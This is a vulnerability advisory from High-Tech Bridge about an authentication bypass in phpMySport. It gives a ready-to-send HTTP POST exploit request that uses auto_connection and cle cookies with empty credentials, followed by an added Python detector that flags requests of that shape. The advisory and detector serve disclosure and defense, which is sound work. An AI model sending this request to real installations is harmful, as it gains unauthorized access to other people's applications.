Authentication Bypass Vulnerability in phpMySport

2010-12-21T00:00:00
ID HTB22773
Type htbridge
Reporter High-Tech Bridge
Modified 2010-12-21T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered multiple vulnerabilities in phpMySport which could be exploited to bypass authentication mechanisms and gain access to the application.

1) Authentication bypass vulnerability in phpMySport
The vulnerability exists due to insufficient validation of input data in the authentication mechanism. A remote attacker can send a specially crafted HTTP POST request to the index.php script, bypass authentication checks and gain unauthorized access to the application.
Exploitation example:
POST /index.php?r=member&v1=login HTTP/1.1
Cookie: auto_connection=1; cle=1;
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

login=&pass=&x=9&y=10
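
Detection example (added here; not code from High-Tech Bridge or phpMySport): a check that flags logged or captured requests with the shape shown above, that is, a login POST carrying the auto_connection and cle cookies with empty login and pass fields. The function names, the host sport.example and the sample credentials are assumptions made for the example.

```python
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, target, headers, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def matches_htb22773(raw):
    """True for a login POST with empty credentials plus both cookies."""
    try:
        method, target, headers, body = parse_request(raw)
    except ValueError:
        return False  # request line could not be parsed
    url = urlsplit(target)
    query = parse_qs(url.query)
    if method != "POST" or not url.path.endswith("/index.php"):
        return False
    if query.get("r") != ["member"] or query.get("v1") != ["login"]:
        return False
    cookies = SimpleCookie()
    cookies.load(headers.get("cookie", ""))
    if "auto_connection" not in cookies or "cle" not in cookies:
        return False
    form = parse_qs(body, keep_blank_values=True)
    # Empty or absent login/pass next to the cookies is the anomaly to alert on.
    return form.get("login", [""]) == [""] and form.get("pass", [""]) == [""]


# Constructed sample requests; host name and credentials are made up.
_HEAD = "POST /index.php?r=member&v1=login HTTP/1.1\r\nHost: sport.example\r\n"
_TYPE = "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
ADVISORY_SHAPED = (_HEAD + "Cookie: auto_connection=1; cle=1;\r\n" + _TYPE
                   + "login=&pass=&x=9&y=10")
ORDINARY_LOGIN = _HEAD + _TYPE + "login=alice&pass=correct-horse&x=9&y=10"
REMEMBERED_LOGIN = (_HEAD + "Cookie: auto_connection=1; cle=1;\r\n" + _TYPE
                    + "login=alice&pass=correct-horse")

if __name__ == "__main__":
    for name in ("ADVISORY_SHAPED", "ORDINARY_LOGIN", "REMEMBERED_LOGIN"):
        print(name, matches_htb22773(globals()[name]))
```

The check matches the request shape only, so a hit means the request should be reviewed together with the session the server issued in response.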